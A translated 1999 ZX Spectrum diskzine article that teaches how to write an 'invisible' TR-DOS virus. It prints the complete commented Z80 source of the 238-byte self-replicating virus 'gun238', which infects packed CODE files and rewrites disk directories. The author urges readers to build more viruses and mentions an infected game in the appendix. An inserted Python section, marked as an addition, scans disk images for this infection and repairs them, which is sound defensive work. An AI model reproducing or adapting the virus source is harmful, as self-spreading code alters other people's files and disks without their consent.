Deja Vu #09
13 November 1999

Coding - Writing a virus invisible to TR-DOS.
(C) Arkady Gobuzov, 1999
__________________________________________



   The first (?) virus to gain some distribution in TR-DOS, and the
first to be described in a computer magazine, was the virus spread
together with the game LAST BATTLE.

   Here I would like to describe a new type of virus, one that
infects not BASIC but CODE files, and does so in such a way that the
size of the files in sectors and the order of the files on the disk
do not change. That is why I called this type of virus "invisible",
although, in fairness, it must be noted that on the PC a stealth
virus means something quite different.

   First, let us recall how the file system in TR-DOS is built: a
file occupies on the disk a size that is a multiple of one sector.
Thus a file of 513 bytes, a file of 768 bytes and a file of 600
bytes all occupy 3 sectors on the disk. Only a file of exactly 768
bytes uses the disk space fully; every other file has, in its last
sector, an unused remainder of between 1 and 255 bytes.

Question number 1:
--------------

   CAN ANYTHING BE WRITTEN INTO THIS UNUSED REMAINDER?

   Apparently it can, and, miracle of miracles, the file size in
sectors will not change.

   Now let us think about which files it makes sense to infect.
Clearly, infecting text files or font files is pointless. We only
need to infect files that, immediately after loading, receive
control by a JUMP or a CALL to their start address.


Question number 2:
--------------

   HOW DO WE DETERMINE WHICH FILES ARE RUN FROM THEIR START ADDRESS?

   Of course, for this we have to load some part of the file into
memory, preferably as small a part as possible. Practice shows that
loading just one sector is enough. I once discovered, more or less
by accident, that files packed with the most common packers for the
Spectrum, namely HRUST, HRUM and MS PACK, and saved from the packer,
always have the following sequence of commands at the start address:

; DI
; LD (NN),SP



   Knowing this, I can always tell from the first sector of a file,
or even more simply from its first two bytes, which files are run
from their start address. You may ask: what about other files? Well,
other files can also be recognised somehow. For example, by the
sequence:

; DI
; LD SP,NN



   Screens packed with a packer can be recognised by the sequence:

; CALL 82 (not necessarily at the start address, but somewhere in
the first sector.)


   So there are many options, but keep in mind that the virus body
should be as small as possible, which is why it is easier to write a
virus that infects only one specific kind of executable file than to
try to write a universal one.


   So, what follows describes a virus that infects files packed with
the most common packers, that is, files which have, starting from
their very first byte, the sequence:

; #F3               DI
; #ED #73 #NN #NN   LD (NN),SP


Question number 3:
--------------

   CAN FILES OF ANY SIZE BE INFECTED?

   Since we will be located immediately after the file, it is easy
to calculate the address at which we will find ourselves in memory
after the infected file has been loaded:

Address = start address of the infected file + length of the file.



   It must be remembered that after loading we need enough room for
the 8 sectors of the directory, the first sector of the file we are
interested in, and a backup copy of the virus: 10 sectors in total,
or 2560 bytes. Recall that at the end of memory, at address 65368,
is the UDG block, the user-defined graphics. It is desirable to
leave it unchanged. Below this block is the stack that BASIC sets up
by default with CLEAR 65367; this stack grows downwards to about
address 65274 (#FEFA). Consider a situation (quite possible) in
which the loader has no CLEAR command and the packed block, after
loading, unpacks itself without touching the stack and then returns
to BASIC. In this case the default stack must not be overwritten
under any circumstances. As a rule, however, the loader sets a
fairly low stack, something like 24575, and after the packed block
there is some unused memory. As explained above, this memory must
begin no higher than 62464 = #FE00 - #A00.

   Once again, to summarise:

Address of the virus body = start address of the infected file +
256 * file size in sectors, and it must be less than 62465.


Question number 4:
--------------

      WHAT IS THE GENERAL SCHEME OF INFECTION?
      HOW DOES THE VIRUS WORK?

   In the infected file the virus body is located immediately after
the file's data.

   So, the infected file is loaded and control is passed to it by a
JP, a CALL or a RANDOMIZE USR to the start address. At the start
address stands a command that transfers control to the virus body.
The rest we read directly from the comments in the assembler listing
(the program is written in ZXASM 3.0):



;---------; Gun238 - stealth virus for TR-DOS
; (C) 1999 gun

; Starting from this address a few variables are stored
LastTrackSectorStore EQU #FE00
AdrCurFilSize        EQU #FE02
SizeStore            EQU #FE04
LastByte             EQU #FE06
LowSize              EQU #FE08

Reserv               EQU #F400

; Body of the stealth virus:
;-----------------
Begin    LD   HL,Begin        ; store a backup
         LD   DE,Reserv       ; copy of the virus
         LD   BC,256
         LDIR

         LD   HL,(23796)      ; remember the current track and sector
         LD   (LastTrackSectorStore),HL

         EX   DE,HL
         PUSH HL              ; HL = #F500
         LD   D,L
         LD   E,L             ; DE = 0
         LD   BC,#805         ; load the
         CALL 15635           ; directory
; The loop below walks through all files in the directory,
; looking for one suitable for infection.
l2       POP  HL              ; HL = #F500, the loaded directory
         JR   loop

l1       LD   BC,3
l3       ADD  HL,BC

loop     LD   A,(HL)          ; reached the end
         OR   A               ; of the directory?
         JR   Z,endrut

         LD   BC,8            ; HL = address of
         ADD  HL,BC           ; the extension
         LD   A,(HL)
         CP   "C"             ; if the file is not CODE,
         JR   NZ,l3           ; skip to the next one

         INC  HL
         LD   E,(HL)          ; DE = start address
         INC  HL
         LD   D,(HL)
         INC  HL
; In the infected file, after the virus has run, control is passed
; to start address + 3, i.e. directly to the instruction that
; follows CALL NN.

; remember the address at which the size of the current file is stored
         LD   (AdrCurFilSize),HL
         LD   C,(HL)
         INC  HL              ; BC = size of
         LD   B,(HL)          ; the file
         INC  HL
         LD   (SizeStore),BC

         EX   DE,HL
         ADD  HL,BC
         LD   (LastByte),HL
         LD   (Reserv+1),HL   ; end address = start + size
         EX   DE,HL
         LD   A,D
         CP   #F4             ; does the file, once loaded, leave
                              ; enough memory for the virus?
         JR   NC,l1           ; if not, go to the next file

         INC  C
         DEC  C
         JR   Z,l4
         INC  B
l4       LD   A,B
         CP   (HL)            ; file size in sectors
         JR   NZ,l1           ; the file obviously has a wrong length, skip it

         LD   A,C             ; low byte of the size; 256 minus this
                              ; is the size of the unused remainder
         LD   (LowSize),A
         CP   (256-VirSize)
         JR   NC,l1           ; remainder too small, go to the next file

         INC  HL
         LD   E,(HL)          ; first sector and
         INC  HL              ; track of the current
         LD   D,(HL)          ; file
         INC  HL
         PUSH HL              ; address of the next file in the directory
         PUSH DE              ; first sector and track of the file
         PUSH BC              ; B = size in sectors

         LD   HL,Reserv+#900
         LD   BC,#105
         CALL 15635           ; load the first sector of the file
         LD   HL,(Reserv+#901)
         LD   BC,#73ED        ; LD (..),SP
         XOR  A
         SBC  HL,BC           ; is the byte sequence we need in place?
         POP  BC
         POP  DE
         POP  HL
         JR   NZ,loop         ; not our file, go to the next one

         JR   Continue        ; this jump is needed so that endrut
                              ; can be "reached" from anywhere by JR
;------------- We arrive here if we have run through all the files
; and found nothing suitable for infection, or after a file has been
; infected. One run of an infected file infects only one file.
endrut   LD   HL,(LastTrackSectorStore)
         LD   (23796),HL
         POP  HL
         LD   (0),SP
StackS   EQU  $-2
         DI
; from the virus body we do not return straight to the byte after
; the CALL, but skip two bytes
         INC  HL
         INC  HL
         JP   (HL)
;----------------
Continue LD   HL,(Reserv+#903)
; save the address at which the file itself stores its stack into
; the backup copy of the virus, which will later be kept in the
; last sector of the infected file
         LD   (Reserv+StackS-Begin),HL
         PUSH DE
         PUSH BC
         LD   HL,Reserv+#902
         LD   BC,(LastByte)
; in the first sector of the infected file, put a jump to the
; address following its last byte; the virus body will be there
         LD   (HL),B
         DEC  HL
         LD   (HL),C
         DEC  HL
         LD   (HL),205        ; CALL
         PUSH HL              ; HL = Reserv+#900
         LD   BC,#106
         CALL 15635           ; write back the first sector
; its beginning now holds the sequence
;   CALL VirusBody
;   DB   N,N
; the last two bytes are skipped over and are never executed
         POP  HL
         POP  BC              ; size in sectors
         POP  DE              ; first track and sector
         DEC  B
; to the first sector and track number of the infected file we add
; its size minus 1, which gives the number of its last sector and
; track:
l5       INC  DE
         LD   A,E
         AND  15
         JR   NZ,l6
         LD   E,A
         INC  D
l6       DJNZ l5              ; DE = last sector of the infected file

         PUSH DE
         PUSH HL
         LD   BC,#105
         CALL 15635           ; load the last sector of the file into memory

         LD   BC,virEnd-Begin
         LD   HL,(SizeStore)
         ADD  HL,BC
         EX   DE,HL           ; DE = size of the file after infection
         LD   HL,(AdrCurFilSize)
         LD   (HL),E          ; make the
         INC  HL              ; change in
         LD   (HL),D          ; the directory
         LD   DE,(LowSize)
         LD   D,#FD
         LD   HL,Reserv
         LDIR                 ; copy the virus into the remainder of the last sector
         POP  HL
         POP  DE
         LD   BC,#106
         CALL 15635           ; write back the modified last sector
         LD   HL,Reserv+#100
         LD   D,L
         LD   E,L
         LD   BC,#806
         CALL 15635           ; write back the directory
         JR   endrut
virEnd
VirSize  EQU  virEnd-Begin
;---------------

   So the virus body is 238 bytes in size. In my opinion it is
difficult to reduce this number without impairing the virus's
capabilities... Although, if you search for and replace a different
sequence of commands, not DI: LD (NN),SP, you can gain a lot. The
first virus using this idea was written by me in the spring of 1995;
its size was only 186 bytes, but it infected not files from MS_PACK,
HRUST or HRUM (these programs did not exist yet) but files saved
from ASC Screen Crasher, in which the command CALL 82 is replaced by
a CALL to the virus body.
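The layout described above can be checked for from the outside, without running anything. The following is an added example, not part of the article and not the author's code: a scanner for .trd disk images that looks for exactly the traces the listing leaves behind: a CODE file whose first byte has become CALL (#CD), whose CALL target equals start address + (directory length - 238), and whose last sector holds the body's opening instructions (LD HL,Begin; LD DE,Reserv; LD BC,256; LDIR) at the offset given by the low byte of the original length. Because the virus overwrites only the first three bytes, the operand NN of LD (NN),SP is still in place, so the same scanner can restore the file and its directory entry. The directory layout it parses (16-byte entries: name, type, start, length, sectors, first sector, first track; a first byte of 0 ends the directory and 1 marks a deleted entry) is standard TR-DOS and matches the offsets the listing walks. The sample image, file names and addresses are constructed for the example.

```python
import struct
from typing import Dict, List, Tuple

SECTOR = 256
SECTORS_PER_TRACK = 16
DIR_SECTORS = 8
VIR_SIZE = 238          # body size stated in the article
RESERV = 0xF400         # the body has to load below this address
# Bytes that follow "LD HL,Begin" at the top of the body in the listing:
# LD DE,Reserv ; LD BC,256 ; LDIR
BODY_PROLOGUE_TAIL = bytes([0x11, 0x00, 0xF4, 0x01, 0x00, 0x01, 0xED, 0xB0])
ORIGINAL_HEAD = bytes([0xF3, 0xED, 0x73])   # DI ; LD (NN),SP


def sector_offset(track: int, sector: int) -> int:
    return (track * SECTORS_PER_TRACK + sector) * SECTOR


def read_directory(img: bytes) -> List[Dict]:
    """Parse the 16-byte entries of the 8 directory sectors on track 0."""
    entries = []
    for i in range(DIR_SECTORS * SECTOR // 16):
        e = img[i * 16:(i + 1) * 16]
        if e[0] == 0:           # end of directory
            break
        if e[0] == 1:           # deleted entry
            continue
        start, length = struct.unpack_from("<HH", e, 9)
        entries.append({"index": i, "name": e[:8].decode("latin-1").rstrip(),
                        "ext": chr(e[8]), "start": start, "length": length,
                        "sectors": e[13], "sector": e[14], "track": e[15]})
    return entries


def last_sector(track: int, sector: int, sectors: int) -> Tuple[int, int]:
    """Advance by sectors-1, the same walk the l5/l6 loop in the listing does."""
    for _ in range(sectors - 1):
        sector += 1
        if sector == SECTORS_PER_TRACK:
            sector, track = 0, track + 1
    return track, sector


def scan_image(img: bytes) -> List[Dict]:
    """One record per CODE file whose layout matches a gun238 infection."""
    hits = []
    for e in read_directory(img):
        if e["ext"] != "C" or e["length"] <= VIR_SIZE:
            continue
        first = sector_offset(e["track"], e["sector"])
        if img[first] != 0xCD:                      # CALL NN in place of DI
            continue
        target = struct.unpack_from("<H", img, first + 1)[0]
        original = e["length"] - VIR_SIZE
        # the CALL must land exactly on the old end of the file ...
        if target != e["start"] + original or target >= RESERV:
            continue
        # ... and the body must sit in the old remainder of the last sector
        lt, ls = last_sector(e["track"], e["sector"], e["sectors"])
        body = sector_offset(lt, ls) + (original & 0xFF)
        expected = bytes([0x21]) + struct.pack("<H", target) + BODY_PROLOGUE_TAIL
        if img[body:body + len(expected)] == expected:
            hits.append({"name": e["name"], "dir_index": e["index"],
                         "body_address": target, "original_length": original,
                         "first_offset": first, "body_offset": body})
    return hits


def disinfect(img: bytes) -> bytearray:
    """Restore DI;LD (NN),SP, put the original length back, wipe the body."""
    out = bytearray(img)
    for h in scan_image(img):
        out[h["first_offset"]:h["first_offset"] + 3] = ORIGINAL_HEAD
        struct.pack_into("<H", out, h["dir_index"] * 16 + 11, h["original_length"])
        out[h["body_offset"]:h["body_offset"] + VIR_SIZE] = bytes(VIR_SIZE)
    return out


def build_sample_image() -> bytearray:
    """Constructed 4-track image (sample data, not a real disk): a clean CODE
    file and one laid out the way the article describes an infected file."""
    img = bytearray(4 * SECTORS_PER_TRACK * SECTOR)

    def entry(i, name, start, length, sectors, sector, track):
        img[i * 16:(i + 1) * 16] = (name.ljust(8).encode() + b"C" +
                                    struct.pack("<HHBBB", start, length, sectors, sector, track))

    entry(0, "loader", 0x8000, 0x0100, 1, 0, 1)
    img[sector_offset(1, 0):sector_offset(1, 0) + 5] = ORIGINAL_HEAD + b"\x00\x5B"
    # "gic": originally 0x0C05 bytes (13 sectors, 251 bytes of remainder);
    # the directory now says 0x0C05 + 238 bytes, still 13 sectors
    start, original = 0x6000, 0x0C05
    entry(1, "gic", start, original + VIR_SIZE, 13, 1, 1)
    first = sector_offset(1, 1)
    img[first:first + 5] = b"\xCD" + struct.pack("<H", start + original) + b"\x00\x5B"
    body = sector_offset(1, 13) + (original & 0xFF)
    img[body:body + 11] = b"\x21" + struct.pack("<H", start + original) + BODY_PROLOGUE_TAIL
    return img
```

Running scan_image(build_sample_image()) reports only "gic", with the body at #6C05 and an original length of #0C05; scan_image(disinfect(...)) then returns nothing. The three conditions are checked together on purpose: a CALL as the first byte alone is common in ordinary CODE files, and a directory length that does not match the sector count alone could be a damaged disk, but a CALL landing exactly 238 bytes before the recorded end of the file, with the body prologue sitting in the old remainder, is specific to this layout.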

   Now about the number of files that can actually be infected:

   Files saved from the packers named above have the same chance of
having 0, 100 or 255 bytes in the remainder; as they say in
probability theory, these outcomes are equally probable. So the
probability that a randomly taken file containing the byte sequence
we need can be infected is (256 - length of the virus) / 256. This
number cannot be equal to one, because the virus body must always
contain something. For this virus the number is slightly less than
1/14. That is, if the disk contains 14 files saved from HRUM, HRUST
or MS_PACK, then most likely only 1 file will be infected; if 28,
then 2, although it may also turn out that nothing can be infected,
or that all the files can be infected (very unlikely). For the virus
that infects ASC files this number is a little more than 1/4.


   Needless to say, the virus performs no destructive actions and,
when infecting, makes every effort to do no harm.

Question number 5:
--------------

     HOW LONG WILL THIS VIRUS LIVE?

   It lives until the infected file is erased. Every time the
infected file is run, the virus loads track zero and looks for a
suitable file. After infection, the size of the file in the
directory is updated and the file no longer has a remainder, so it
cannot be infected again. If the disk contains no suitable file,
then after the virus has done its work we return to the infected
block as if nothing had happened. Once the infected file is copied
to another disk, it begins its insidious work there too.

Question number 6:
--------------

      WHAT HAPPENS IF THE DISK IS WRITE-PROTECTED?

   It will be bad. When attempting an infection, the virus will try
to write data to the write-protected disk, and an error message will
appear on the screen. To avoid this, the virus would have to check
for write protection when infecting; moreover, its size would then
have to grow past the 255-byte mark, which is unrealistic for
viruses of this type.

Question number 7:
--------------

 IS IT POSSIBLE TO WRITE A VIRUS LARGER THAN 255 BYTES
   THAT STILL DOES NOT SPOIL ANY FILES?

   You can, but then it will only be able to infect files located at
the very end of the directory, or files after which there is a
deleted file on the disk. Making the appropriate changes to the
directory will not take an advanced Spectrum user much effort.
Increasing the size makes it possible to perform more checks and,
accordingly, to infect a larger number of executable files. You can
also add some of the effects that PC viruses are famous for.

Now the main thing:

Question number 8:
--------------

      WHAT THE HECK ARE ALL THESE VIRUSES NEEDED FOR?

   It's interesting, you must agree!? Besides, every computer that
has a disk system has viruses. They exist on the Amiga, on the PC
and on Macs. I believe their absence in TR-DOS was only temporary.
The purpose of this article is to fill that gap and to mark out the
main direction of virus-building in TR-DOS. But I urge everyone who
tries to write a virus not to build destructive features into it; it
is better to give it some fun effects, without zeroing track zero
after the 13th infection or deleting files.

    More viruses, good and different!


P.S. In the appendix you can find the game GIHERO; its main block,
called "gic", is infected with gun238.

You can send your comments to the author by email: gobuzov@yahoo.com
And visit me at http://speccy.da.ru





